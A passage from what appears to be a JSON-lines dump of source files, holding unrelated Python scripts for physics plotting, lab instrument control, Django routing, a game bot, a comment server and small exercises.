\"GET\")\n","sub_path":"scalyr_agent/builtin_monitors/tests/url_monitor_test.py","file_name":"url_monitor_test.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"335447060","text":"\nfrom starter2 import *\n\nimport data_locations as dl\nreload(dl)\nimport davetools as DT\nfrom scipy.interpolate 
import *\nreload(DT)\nplt.close('all')\n#file_list=glob.glob('/home/dcollins/scratch/Paper19/particle_error/particle_error_test_c0031_threeframes.h5')\n#file_list=glob.glob('/home/dcollins/scratch/Paper19/particle_error/track_indfix_sixteenframe_core_0031.h5')\n#file_list=glob.glob('/home/dcollins/scratch/Paper19/particle_error/track_indfix_sixteenframe_core_0031.h5')\n#file_list=glob.glob('/scratch1/dcollins/Paper19/track_index_fix/track_indfix_sixteenframe_core_*.h5')\n#file_list=glob.glob('/home/dcollins/scratch/Paper19/track_index_fix/track_indfix_sixteenframe_core_*.h5')\n\nfile_list=glob.glob('%s/track_indfix_sixteenframe_core_*.h5'%dl.snapshot_location)\n#file_list=file_list[0:4]\nplt.close('all')\nG = 1620./(4*np.pi)\nslope_array = []\ninter_array = []\nr_final_array = []\ny_den_array= []\np_10_array = []\np_11_array = []\n#norm = ds.arr(1,'cm')\n\nif 'ext_v' not in dir():\n ext_d=dl.extents()\n ext_r=dl.extents()\n print(\"Running Extents\")\n for nfile,fname in enumerate(file_list):\n this_looper=looper.core_looper(directory=dl.enzo_directory)\n trw.load_loop(this_looper,fname)\n thtr = this_looper.tr\n if True:\n for frame in this_looper.snaps:\n for core_id in this_looper.snaps[frame]:\n density = thtr.c([core_id],'density')\n snap = this_looper.snaps[frame][core_id]\n if snap.R_mag.any() >1:\n ext_r(snap.R_mag)\n ext_d(snap.field_values['density'])\nfor nfile,fname in enumerate(file_list):\n #0164.h5\n print('nfile is = %d'%nfile)\n t1 = fname.split(\"/\")[-1]\n #l = len(\"track_three_to_test_core_\")\n #l = len(\"track_sixteen_frames_core_\")\n l = len(\"track_indfix_sixteenframe_core_\")\n\n this_cor = int(t1[l:l+4]) #[fname.index('_'):]\n #this_cor=31\n #if this_cor not in [12]:#, 31]:\n # continue\n print(this_cor)\n this_looper=looper.core_looper(directory=dl.enzo_directory)\n trw.load_loop(this_looper,fname)\n thtr = this_looper.tr\n all_cores = np.unique(thtr.core_ids)\n core_list=all_cores\n rm = rainbow_map(len(all_cores))\n if 1:\n #big histogram\n asort = np.argsort(thtr.times)\n n0=asort[0]\n tsorted = thtr.times[asort]\n density_h = density.transpose()\n density_r = np.zeros([16,181])\n all_density =[]\n all_radius = []\n #for i in range(len(density_h)):\n # density_r[i] = density_h[15-i]\n\n #print('the length of density 2 is %d'%len(density_2))\n #print(density)\n y = np.zeros([len(snap.R_mag)])\n y_c = np.zeros([len(snap.R_mag)])\n #all_density = np.zeros([len(tsorted),len(snap.field_values['density'])])\n #all_rad = np.zeros([len(snap.R_mag)])\n #print('length is %d'%len(snap.field_values['density']))\n #print('the length of radius array is %d'\n\n fig=plt.figure(figsize=(4,4))\n axa=fig.subplots(1,1)\n frame_list=sorted(list(this_looper.snaps.keys()))\n tmap=rainbow_map(len(this_looper.snaps.keys()))\n tmap_2=rainbow_map(len(tsorted))\n #for iframe in range(len(frame_list)):\n #print(iframe)\n\n for iframe,frame in enumerate(frame_list):\n t_good = tsorted[iframe]\n #print('the length of R_mag is: %d ' % len(snap.R_mag))\n #print(snap.R_mag)\n #print('the value of the index is = %d'%iframe)\n #print('the value of the frame is = %d'%frame)\n #print('the value of the time is = %f'%tsorted[iframe])\n #print('the length of the density is %d'%len(snap.field_values['density']))\n #print(density_r[iframe]-snap.field_values['density'])\n #for i in range(len(snap.field_values['density'])):\n #all_density[iframe][i] = snap.field_values['density'][i]\n \n \n \n\n\n for core_id in this_looper.snaps[frame]:\n snap = this_looper.snaps[frame][core_id]\n if len(snap.R_mag) < 
3:\n continue\n ave_density = snap.field_values['density'].mean(axis=0)\n ave_R = snap.R_mag.mean(axis=0)\n all_rad=snap.R_mag\n #print(snap.R_mag)\n #y = 2*(snap.R_mag)**(-2)*t_good**2\n #y_c = (snap.R_mag)**(-1.5)\n #y = (np.pi*4*G)**(-1)*(2/(snap.R_mag)**2)\n #y_c = (np.pi*4*G)**(-1)*(0.975/2)**(0.5)*(t_good**(-0.5)*snap.R_mag**(-1.5))\n #for i in range(len(snap.field_values['density'])):\n #all_density[iframe][i] = snap.field_values['density'][i]\n\n the_R = snap.R_mag\n the_R[the_R<1./2048]=1./2048\n all_radius.append(the_R)\n all_density.append(snap.field_values['density'])\n #print('the length of the_R is %d'%len(snap.field_values['density']))\n ave_the_R = the_R.mean(axis=0)\n #p1 = np.polyfit(ave_the_R, ave_density,2)\n #print(p1)\n\n axa.scatter(the_R,snap.field_values['density'],c=tmap(iframe,snap.R_mag.size),s=0.1,label=str(frame))\n #axa.plot(the_R,np.poly1d(p1,ave_the_R),'r-')\n y = (np.pi*4*G)**(-1)*(20/(snap.R_mag)**2)\n #axa.plot( snap.R_mag, y, c= tmap_2(iframe))\n #axa.plot(ave_R,ave_density, c = 'k',marker='*')\n all_density = np.array(all_density)\n all_radius = np.array(all_radius)\n all_density= all_density.flatten()\n all_radius = all_radius.flatten()\n density_log = np.log10(all_density)\n radius_log = np.log10(all_radius)\n if len(all_radius) > 0:\n p1 = np.polyfit(radius_log,density_log,1)\n p_10_array.append(p1[0])\n p_11_array.append(p1[1])\n slope_array.append(p1[0])\n inter_array.append(10**p1[1])\n r_final_array.append(min(all_radius))\n print(p1)\n y_den = 10**p1[1]*all_radius**p1[0] \n if len(y_den)>0:\n y_den_array.append(max(y_den))\n axa.scatter(all_radius,y_den,s=2,c = 'k',marker='*')\n #DT.axbonk(axa,xscale=('symlog',linthreshy=1/2048),yscale='log',xlabel='R_mag',ylabel='density')\n axa.set_xscale('symlog',linthreshx=1./2048)\n axa.set_yscale('log')\n axa.set_xlim(1./2048,1./10)\n axa.set_ylim(1,10**6)\n axa.set_title('the slope is %f and the y intercep is %f' %(p1[0],10**p1[1]))\n #axa.set_yscale('symlog',linthreshy=vel_linthresh)\n #axa.set_xscale('symlog',linthreshx=2*rmin)\n outname = 'image_tracks/density_part_poly_c%04d.png'%core_id\n print(outname)\n #axa.legend(loc=0)\n fig.savefig(outname)\n if len(slope_array)==160:\n plt.clf()\n#----------------------- making histogram -------------------------------------------------#\n plt.hist(slope_array,bins = 2)\n outname2 = 'image_tracks/density_histo_slope_more.png'\n print(outname2)\n plt.savefig(outname2)\n#------------------------- making intercept vs slope graph ---------------------------------#\n plt.clf()\n plt.scatter(slope_array,inter_array, c = 'r', marker = '*')\n plt.xscale('linear')\n plt.yscale('linear')\n plt.xlabel('slope')\n plt.ylabel('y_intercept')\n plt.ylim([min(inter_array),max(inter_array)+1])\n outname3 = 'image_tracks/slope_vs_inter_linear.png'\n plt.savefig(outname3)\n plt.clf()\n plt.scatter(slope_array,y_den_array,c='k',marker='*')\n plt.xscale('linear')\n plt.yscale('log')\n plt.xlabel('slope')\n plt.ylabel('true y_intercept')\n plt.ylim([min(y_den_array),max(y_den_array)])\n outname4 = 'image_tracks/slope_vs_y_inter.png'\n plt.savefig(outname4)\n plt.clf()\n #p_new = np.polyfit(y_den_array,y_den_max,1)\n #print(\"p_new is:\")\n #print(p_new)\n plt.scatter(slope_array,r_final_array,c='k',marker='*')\n #plt.scatter(y_den_array,y_den_array+p_new[1],c='r',marker='*')\n plt.xlabel('slope')\n plt.ylabel('final radius')\n #plt.title('the slope is %f'%(p_new[0]))\n plt.xscale('linear')\n plt.yscale('log')\n plt.ylim=([min(r_final_array),max(r_final_array)])\n outname5 = 
'image_tracks/radius_vs_slope.png'\n plt.savefig(outname5)\n","sub_path":"other_scripts/density_particle_poly.py","file_name":"density_particle_poly.py","file_ext":"py","file_size_in_byte":8690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"11051103","text":"import webbrowser\n\n\n# Written during course of lecture videos\nclass Movie():\n \"\"\"\n Movie class that holds title, storyline, poster image, and a url to \n the trailer.\n \"\"\"\n def __init__(self, movie_title, movie_storyline, poster_image,\n trailer_youtube):\n self.title = movie_title\n self.storyline = movie_storyline\n self.poster_image_url = poster_image\n self.trailer_youtube_url = trailer_youtube\n\n def show_trailer(self):\n webbrowser.open(self.trailer_youtube_url)\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"574174190","text":"'''\nI-V recorder\nPP 07-11-2018\nusage iv_recorder \n'''\n# Added a command to read the real voltage (line 78-80) : 16-07-2018 by Osama Mohsen\n# Added a new path to sort measurments by date in the Documents \nfrom __future__ import print_function #Python 2.7 compatibility\nimport gpib\nimport time\nimport numpy as np\nimport os\n###############################################\n\n\nNsamp=100 # number of point to record\nNstep=40 # number of point to record\nVmin=2000\nVmax=8000\ndir_path = '/usr/local/home/labuser/Documents/'\nrootname = 'iv_monitoring'\n\n\n###############################################\n\n\nusb_port=gpib.Control()\n\ntimestamp = time.strftime(\"D%Y%m%dT%H%M%S\")\n\nnewdir = time.strftime(\"%y-%B-%d\")\n\npath = dir_path+str('/')+str(newdir)\n\nif not os.path.isdir(path):\n os.makedirs(path)\n\ndir_path = path\n\nfilename = dir_path+str('/')+rootname+'_'+timestamp\n\nNpts=Nsamp*Nstep\nchart_time = np.zeros((Npts))\ncurrent = np.zeros((Npts))\nvoltage = np.zeros((Npts))\nvoltage_set= np.linspace(Vmin, Vmax, Nstep+1)\n\n\nusb_port=gpib.Control()\n\nint_range = 2e-7\nusb_port.x.write(\"*RST\") \ntime.sleep(0.50)\nusb_port.x.write(\"SYST:ZCH OFF\")\ntime.sleep(0.50)\nrange_comm = str('\\'SENS:CURR:RANG')+str(' ')+str(int_range)+str('\\'')\nusb_port.x.write(range_comm)\ntime.sleep(0.50)\nusb_port.x.write(\"SYST:AZER:STAT OFF\") \ntime.sleep(0.50)\n\n\ncommand = str('VSET') + str(Vmin)\nusb_port.x.write('++addr 13')\nusb_port.x.write(command)\nusb_port.x.write('HVON')\nm = usb_port.x.query_ascii_values('VOUT?')\nprint(m)\n\nfor i in range(Nsamp):\n tmp=usb_port.x.query_ascii_values('read?',separator='A',container=np.array)\n print(tmp[0])\n\n\n","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"243961139","text":"\"\"\"healthnet URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\nfrom django.conf.urls import url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\n\nfrom healthnet import views\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^dashboard/', views.dashboard, name=\"dashboard\"),\n url(r'^log/(?P\\d{2}-\\d{2}-\\d{4})/(?P\\d{2}-\\d{2}-\\d{4})', views.log, name=\"log\"),\n url(r'^log/', views.log, name=\"log\"),\n url(r'^result/(?P\\d+)/', views.result, name=\"result\"),\n url(r'^prescription/(?P\\d+)/', views.prescription, name=\"prescription\"),\n url(r'^$', views.index, name=\"index\"),\n url(r'^cancel_appointment/(?P\\d+)/$', views.cancel_appointment, name=\"cancel_appointment\"),\n url(r'^remove_prescription/(?P\\d+)/$', views.remove_prescription, name=\"remove_prescription\"),\n url(r'^register/', views.registration1, name=\"registration\"),\n url(r'^register2/', views.registration2, name=\"registration2\"),\n url(r'^logout/', views.logout, name=\"logout\"),\n url(r'^create_appointment_1/', views.create_appointment_1, name=\"create_appointment_1\"),\n url(r'^create_appointment_2/', views.create_appointment_2, name=\"create_appointment_2\"),\n url(r'^create_appointment_3/', views.create_appointment_3, name=\"create_appointment_3\"),\n url(r'^edit_info/(?P\\d+)/$', views.edit_info, name=\"edit_info\"),\n url(r'^edit_info/', views.edit_info, name=\"edit_info\"),\n url(r'^edit_appointment/(?P\\d+)/', views.edit_appointment, name=\"edit_appointment\"),\n url(r'^release_test_result/(?P\\d+)/', views.release_test_result, name=\"release_test_result\"),\n url(r'^create_test_result/(?P\\d+)/(?P[\\w|\\W]+)/$', views.create_test_result,\n name=\"create_test_result\"),\n url(r'^create_test_result/(?P\\d+)/', views.create_test_result, name=\"create_test_result\"),\n url(r'^create_prescription/(?P\\d+)/(?P[\\w|\\W]+)/$', views.create_prescription,\n name=\"create_prescription\"),\n url(r'^create_prescription/(?P\\d+)/', views.create_prescription, name=\"create_prescription\"),\n url(r'^toggle_admit/(?P\\d+)/$', views.toggle_admit, name=\"toggle_admit\"),\n url(r'^transfer/(?P\\d+)/$', views.transfer, name=\"transfer\"),\n url(r'^toggle_read/(?P\\d+)/$', views.toggle_read, name=\"toggle_read\"),\n url(r'^approve_user/(?P\\d+)/$', views.approve_user, name=\"approve_user\"),\n url(r'^send_message/(?P\\d+)/$', views.send_message, name=\"send_message\"),\n url(r'^send_message/', views.send_message, name=\"send_message\"),\n url(r'^reply_message/(?P\\d+)/$', views.reply_message, name=\"reply_message\"),\n url(r'^sent_messages/', views.sent_messages, name=\"sent_messages\"),\n url(r'^inbox/', views.inbox, name=\"inbox\"),\n url(r'^doctor_registration/', views.doctor_registration, name=\"doctor_registration\"),\n url(r'^edit_doctor_info/(?P\\d+)/$', views.edit_doctor_info, name=\"edit_doctor_info\"),\n url(r'^edit_doctor_info/', views.edit_doctor_info, name=\"edit_doctor_info\"),\n url(r'^nurse_registration/', views.nurse_registration, name=\"nurse_registration\"),\n url(r'^edit_nurse_info/(?P\\d+)/$', views.edit_nurse_info, name=\"edit_nurse_info\"),\n url(r'^edit_nurse_info/', views.edit_nurse_info, name=\"edit_nurse_info\"),\n url(r'^admin_registration/', views.admin_registration, name=\"admin_registration\"),\n url(r'^view_profile/(?P\\d+)/$', views.view_profile, name=\"view_profile\"),\n url(r'^statistics/(?P\\d+)/(?P\\d{2}-\\d{2}-\\d{4})/(?P\\d{2}-\\d{2}-\\d{4})$',\n views.statistics, name=\"statistics\"),\n 
url(r'^statistics/(?P\\d+)/$', views.statistics, name=\"statistics\"),\n url(r'^export/$', views.export, name=\"export\"),\n url(r'^register_choose/$', views.register_choose, name=\"register_choose\"),\n\n # DEBUG\n # url(r'^debug/create_test_user', views.create_test_user, name=\"create_test_user\"),\n # url(r'^debug/create_admin_user', views.create_admin_user, name=\"create_admin_user\"),\n # url(r'^debug/create_test_doctor', views.create_test_doctor, name=\"create_test_doctor\"),\n # url(r'^debug/create_test_nurse', views.create_test_nurse, name=\"create_test_nurse\"),\n ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"healthnet/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"124067525","text":"from django.conf.urls import url\n\nurlpatterns = [\n\n url(r'^$', 'htm.views.mainIndex'),\n # url(r'^tag/$', 'htm.views.htmTag'),\n\n #2018-06-20\n url(r'^tag/add/$', 'htm.views.htmAdd', name='add'),\n # placed above so it is not captured by the catch-all pattern below\n url(r'^tag/([a-z]+)/$', 'htm.views.htmAdd'),\n \n \n\n\n \n #2018-06-18\n url(r'^tag/$', 'htm.views.htmSearch'),\n # practice\n url(r'^calc/$', 'htm.views.htmCalc'),\n url(r'^calc/result/$', 'htm.views.htmResult'),\n # wondered why this errored - it breaks once a name value is added; if names are used, do they have to be added to every url?... \n\n]","sub_path":"proj7/myweb/htm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"397885420","text":"# Letters Rearranging\nimport sys\ndef is_palindromes(string):\n # palindrome check\n good = True\n for k in range(len(string) // 2):\n if string[k] != string[-(k + 1)]:\n good = False\n break\n return good\n\ndef rearrange(i, j, string):\n string[i], string[j] = string[j], string[i]\n return string\n\n\nfor _ in range(int(sys.stdin.readline())):\n string = list(sys.stdin.readline().rstrip())\n is_good = False\n for i in range(len(string) - 1):\n re_string = rearrange(i, i + 1, string)\n if not is_palindromes(re_string):\n is_good = True\n print(''.join(re_string))\n break\n if not is_good:\n print(-1)\n","sub_path":"SsangWoo/python/codeforce/contest/1093-B.py","file_name":"1093-B.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"371084651","text":"def exam16():\n x=input().split(\" \")\n n,p=int(x[0]),int(x[1])\n counter=[]\n string=[i for i in input().split(\" \")]\n alph=['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n for item in string:\n l=len(item)\n inter=alph.index(item[l-1])+alph.index(item[l-2])*2**5+alph.index(item[l-3])*2**10\n loc=inter%p\n if counter.count(loc)>0:\n probe=counter.count(loc)\n while counter.count(loc)!=0:\n loc=loc+probe**2\n probe+=1\n if loc>=p: # index p itself would fall outside a table of size p\n loc=loc%p\n counter.append(loc)\n for i in range(len(counter)-1):\n print(counter[i],end=\" \")\n print(counter[len(counter)-1])\n\nexam16() ","sub_path":"Code/CodeRecords/2962/60586/299890.py","file_name":"299890.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"597391069","text":"def getTriangle():\n a,b,c = input().split()\n a=int(a)\n b=int(b)\n c=int(c)\n if not a + b > c or not b + c > a or not c + a > b:\n print('1')\n elif a==b==c:\n print('2')\n elif a==b or a==c or b==c: \n 
print('3')\n else:\n print('4')\ngetTriangle() \n","sub_path":"week1/triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"414591508","text":"\r\nimport pathing\r\n# isEnemies, spread and attack are assumed to live in the pathing helper module\r\nfrom pathing import isEnemies, spread, attack\r\nimport generals\r\nimport time\r\n\r\n# tile types\r\nempty = -1\r\nmountain = -2\r\nfog = -3\r\nobstacle = -4\r\n\r\n# game settings\r\nuserId = \"16141231\"\r\nname = \"careNo\"\r\ngameType = 'private'\r\nlobby = 'ihatebugs'\r\n\r\ngame = generals.Generals(userId, name, gameType, lobby)\r\n\r\nupdateTimes = []\r\nlongestUpdate = 0\r\n\r\nfor update in game.get_updates():\r\n\r\n\tcomplete = update['complete']\r\n\r\n\tif(complete):\r\n\t\tprint(\"replay:\", update['replay_url'])\r\n\t\ttotal = 0 # renamed from 'sum' to avoid shadowing the built-in\r\n\t\tfor n in updateTimes:\r\n\t\t\ttotal += n\r\n\r\n\t\tprint(\"Avg Time:\", round(total/len(updateTimes), 6))\r\n\t\tcontinue\r\n\r\n\tpi = update['player_index']\r\n\tgeneral = update['generals'][pi]\r\n\tterrain = update['tile_grid']\r\n\tarmies = update['army_grid']\r\n\tcities = update['cities']\r\n\tturn = update['turn']\r\n\r\n\tlandCount = update['lands'][pi]\r\n\r\n\t#print(\"landCount:\", landCount)\r\n\r\n\r\n\tif(turn > 26):\r\n\t\tstart = time.time()\r\n\t\tif(landCount < 35 or isEnemies(terrain, pi) == False):\r\n\t\t\t#print(isEnemies(terrain, pi))\r\n\t\t\tspread(armies, terrain, pi, general)\r\n\r\n\t\telse:\r\n\t\t\tattack(armies, terrain, general, pi)\r\n\r\n\r\n\r\n\t\tupdateTime = round(time.time() - start, 6)\r\n\t\tprint(\"updateTime:\", updateTime)\r\n\t\tif(updateTime > longestUpdate): # track the slowest update; '<' could never trigger\r\n\t\t\tlongestUpdate = updateTime\r\n\t\tupdateTimes.append(updateTime)\r\n\r\n","sub_path":"giobot.py","file_name":"giobot.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"542733178","text":"# coding: utf-8\n# This file is a part of VK4XMPP transport\n# © simpleApps, 2013.\n\ndef parseAttachments(self, msg):\n\tbody = str()\n\tif msg.has_key(\"attachments\"):\n\t\tif msg[\"body\"]:\n\t\t\tbody += _(\"\\nAttachments:\")\n\t\tattachments = msg[\"attachments\"]\n\t\tfor att in attachments:\n\t\t\tkey = att.get(\"type\")\n\t\t\tif key == \"wall\":\n\t\t\t\tatt[key][\"from_id\"] = abs(att[key][\"from_id\"])\n\t\t\t\tbody += \"https://vk.com/public%(from_id)s?w=wall-%(from_id)s_%(id)s\"\n\t\t\telif key == \"photo\":\n\t\t\t\tkeys = (\"src_xxxbig\", \"src_xxbig\", \"src_xbig\", \"src_big\", \"src\", \"url\", \"src_small\")\n\t\t\t\tfor dKey in keys:\n\t\t\t\t\tif att[key].has_key(dKey):\n\t\t\t\t\t\tbody += \"\\n\" + att[key][dKey]\n\t\t\t\t\t\tbreak\n\t\t\telif key == \"video\":\n\t\t\t\tbody += \"\\nVideo: http://vk.com/video%(owner_id)s_%(vid)s — %(title)s\"\n\t\t\telif key == \"audio\":\n\t\t\t\tbody += \"\\nAudio: %(performer)s — %(title)s — %(url)s\"\n\t\t\telif key == \"doc\":\n\t\t\t\tbody += \"\\nDocument: %(title)s — %(url)s\"\n\t\t\telse:\n\t\t\t\tbody += \"\\nUnknown attachment: \" + str(att[key])\n\t\t\tbody = body % att.get(key, {})\n\treturn body\n\nHandlers[\"msg01\"].append(parseAttachments)","sub_path":"extensions/attachments.py","file_name":"attachments.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"140717992","text":"from config import *\n\nimport cherrypy\n\nimport persistentdata\nimport pages\nimport util\n\nclass GetCommentServ(object):\n\tdef __init__(self):\n\t\tself.data = 
persistentdata.Get(\"comicdata\")\n\t\tself.comics = self.data.AddChild(\"comics\")\n\n\t\tself.commentdata = persistentdata.Get(\"commentdata\")\n\t\tself.blacklist = self.commentdata.AddChild(\"blacklist\")\n\t\tself.comments = self.commentdata.AddChild(\"comments\")\n \n\tdef GetComment(self, comicid, commentid):\n\t\tcomment = self.comments[comicid][commentid]\n\t\t\n\t\tif comment == None:\n\t\t\treturn \"\"\n\n\t\treturn pages.GetPart(\"comment\", **comment._dict)\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\tdef GetComments(self):\n\t\tparams = cherrypy.request.json\n\n\t\tcomicid = int(params[\"comicid\"])\n\n\t\tif comicid not in self.comments:\n\t\t\tself.comments.AddChild(comicid)\n\n\t\tif \"commentid\" in params:\n\t\t\tcommentid = int(params[\"commentid\"])\n\n\t\telse:\n\t\t\treturn {\"total\": len(self.comments[comicid])}\n\n\t\tif \"amount\" in params:\n\t\t\tamount = int(params[\"amount\"])\n\t\t\tamount = min(COMMENTSPERPAGE, amount)\n\t\t\tcomments = []\n\n\t\t\tlimit = amount + commentid\n\n\t\t\twhile commentid < limit:\n\t\t\t\tcomment = self.GetComment(comicid, commentid)\n\n\t\t\t\tif not comment:\n\t\t\t\t\tbreak\n\n\t\t\t\tcomments.append(comment)\n\t\t\t\tcommentid += 1\n\n\t\t\treturn {\"comments\": \"\\n\".join(comments), \"lastId\": commentid}\n\n\t\telse:\n\t\t\treturn {\"comment\" : self.GetComment(comicid, commentid)}\n\n\nclass MakeCommentServ(object):\n\tdef __init__(self):\n\t\tself.data = persistentdata.Get(\"comicdata\")\n\t\tself.comics = self.data.AddChild(\"comics\")\n\n\t\tself.commentdata = persistentdata.Get(\"commentdata\")\n\t\tself.blacklist = self.commentdata.AddChild(\"blacklist\")\n\t\tself.comments = self.commentdata.AddChild(\"comments\")\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\tdef MakeComment(self):\n\t\tif cherrypy.request.remote.ip in self.blacklist:\n\t\t\treturn {\"alert\": \"Blacklisted\", \"success\": 0}\n\n\t\tparams = cherrypy.request.json\n\n\t\tcomicid = int(params[\"comicid\"])\n\n\t\tcontent = util.FormatHtml(util.UnescapeHtml(str(params[\"content\"])))\n\t\ttitle = util.EscapeHtml(str(params[\"title\"]))\n\t\tusername = util.EscapeHtml(str(params[\"username\"]))\n\n\t\tif not (title and username and content):\n\t\t\treturn {\"alert\": \"Missing feilds\", \"success\": 0}\n\n\t\tif len(title) > COMMENTTITLEMAX:\n\t\t\treturn {\"alert\": \"Comment title too long\", \"success\": 0}\n\n\t\tif len(content) > COMMENTCONTENTMAX:\n\t\t\treturn {\"alert\": \"Comment too long\", \"success\": 0}\n\n\t\tif len(username) > COMMENTUSERNAMEMAX:\n\t\t\treturn {\"alert\": \"Username too long\", \"success\": 0}\n\n\t\tcomiccomments = self.comments.AddChild(comicid)\n\n\t\tcommentid = len(comiccomments)\n\n\t\tcommentid = len(self.comments.AddChild(comicid))\n\t\tchild = comiccomments.AddChild(commentid)\n\n\t\tchild[\"content\"] = content\n\t\tchild[\"title\"] = title\n\t\tchild[\"username\"] = username\n\n\t\treturn {\"alert\": \"Successfully posted\", \"success\": 1, \"newid\": commentid}\n\n","sub_path":"datashock/comments.py","file_name":"comments.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"240251442","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\ndataSet = {'Traditional': 1, 'Urban': 136, 'Alternative & Punk': 169, 'Classical': 4, 'Rock': 88, 'Electronica': 59, 'Jazz': 4, 'Other': 33, 'Soundtrack': 7, 'Pop': 135}\nfig = 
plt.figure()\n\nwidth = 0.75\nind = np.arange(len(dataSet.values()))\nplt.bar(ind, dataSet.values())\nplt.xticks(ind + width / 2, dataSet.keys())\n\nfig.autofmt_xdate()\n\nplt.savefig(\"figure.jpg\")","sub_path":"bargraph.py","file_name":"bargraph.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"570690220","text":"import os\nimport re\nimport ai_info\nimport global_config\nimport collections\nimport glob\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn import linear_model\nfrom sklearn.metrics import mean_squared_error\nfrom read_data.utils import *\nfrom read_data.perf import *\nfrom analyze_interference import computeExpectedCost\n\n# from read_data.resource import *\n# from analyze_interference import *\nNODE_TO_HOSTNAME = {\"puri\": \"puri.mimuw.edu.pl\", \"kulcha\": \"kulcha.mimuw.edu.pl\",\n \"baati\": \"ip_10_2_1_93\", \"dosa\": \"ip_10_2_1_91\"}\nHOSTNAME_TO_NODE = {host: node for node, host in NODE_TO_HOSTNAME.items()}\nMETRIC_CBTOOL_PREFIX = \"app_\"\n\n\nclass SchedulerExperimentRecord:\n def __init__(self, base_path, expid, composition_id, shuffle_id, custom_scheduler, ai_types, exp_series):\n self.base_path = base_path\n self.expid = expid\n self.path = os.path.join(base_path, expid)\n self.composition_id = composition_id\n self.shuffle_id = shuffle_id\n self.custom_scheduler = custom_scheduler\n self.ai_types = ai_types\n self.exp_series = exp_series\n self.split_interval = None\n self.checkOneAIOneHost()\n\n def getSplitInterval(self, df):\n mins = [df.loc[df[\"ai_name\"] == name, \"datetime\"].min() for name in df[\"ai_name\"].unique()]\n return max(mins) + pd.Timedelta(minutes=2), df[\"datetime\"].max()\n\n def aggregatePerfForAiNameAndMetric(self, df, d, metric, ai_name):\n df = df.loc[df[metric].notna(), :]\n if df.empty:\n msg = f\"Performance aggregation failed: no datapoints for \" \\\n f\"{d} metric={metric}\"\n raise ValueError(msg)\n return getPerfAggregateForMetricHelper(df, d, metric)\n\n def aggregatePerfForAiName(self, df, ai_name):\n d = {\"exp_id\": self.expid, \"composition_id\": self.composition_id, \"shuffle_id\": self.shuffle_id,\n \"scheduler\": self.custom_scheduler, \"ai_name\": ai_name}\n df = df.loc[(df[\"ai_name\"] == ai_name), :]\n host_names = df[\"host_name\"].unique()\n if len(host_names) != 1:\n raise KeyError(f\"Unexpected number of host names for single ai {len(host_names)}!=1\")\n d.update({\"host_name\": host_names[0]})\n ai_roles = df[\"role\"].unique()\n ai_types = [ai_info.AI_ROLE_TO_TYPE[role] for role in ai_roles]\n if len(ai_types) != 1:\n raise KeyError(f\"Unexpected number of ai types for single ai {len(ai_types)}!=1\")\n d.update({\"type\": ai_types[0]})\n for m in ai_info.AI_TYPE_TO_METRICS[ai_types[0]]:\n metric = f\"{METRIC_CBTOOL_PREFIX}{m}\"\n d = self.aggregatePerfForAiNameAndMetric(df, d, metric, ai_name)\n return toSingleRowDF(d)\n\n def aggregatePerf(self, df):\n self.split_interval = self.getSplitInterval(df)\n ts = self.split_interval\n df = df.loc[dfInterval(df, *ts), :]\n ai_names = df[\"ai_name\"].unique()\n results = pd.DataFrame()\n for ai_name in ai_names:\n result = self.aggregatePerfForAiName(df, ai_name)\n results = results.append(result, ignore_index=True)\n return results\n\n def computeAINameToHostAndTypeMap(self, df):\n df = df.loc[df[\"exp_id\"] == self.expid, :]\n ai_name_to_host_and_type = 